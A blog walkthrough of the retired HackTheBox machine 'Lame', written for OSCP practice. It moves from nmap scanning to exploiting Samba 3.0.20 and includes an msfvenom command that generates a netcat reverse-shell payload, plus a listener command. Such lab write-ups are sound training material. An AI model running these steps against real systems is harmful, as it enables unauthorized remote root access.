Lame | HTB | Walkthrough w/o Metasploit

Lame is a retired box on HackTheBox. Currently I am preparing for OSCP, this box is mentioned in TJ_Null’s list of OSCP like VMs. So I am going to do it without metasploit (since, metasploit is allowed only once in the exam). Let us begin.


port-scan result
port-scan result

I did a simple port scan and found ports 21, 22 139 and 445 to be open.

service-scan result
service-scan result

-p : specifying ports.

-sV : version detection.

Here, I did a service version scan (with -sV switch of nmap) to find exactly what version of the softwares are running on the ports.

Let us now dig deeper and do a nmap default script scan (with the -sC switch).

script-scan results
script-scan results

-sC : default script scan.

I could not snap the whole screen as the output was quite large. But the above shot has everything we need to know.

Script scan reveals that the box is running Samba 3.0.20-Debian on port 445.


After a google search, I found this exploit on github.


However, for the exploit to work, you will need to modify it a bit.

You have to put your IP address and port to get a reverse shell.

I am going to generate payload via msfvenom and put it on the buf variable.

msfvenom -p cmd/unix/reverse_netcat LHOST=<IP> LPORT=<PORT> -f python

Copy the output and paste it on the exploit code. On a second terminal tab, set up a netcat listener.

nc -nlvp <PORT>

Remember to listen on the same port that you provided on the payload.

Run the python code, and you should get a shell.

running exploit
running exploit

We do not need to escalate our privileges as we are already root. Now you can read and submit the flags.

So that was the Lame box. Hope you liked it :)


Breaking things like a bàKà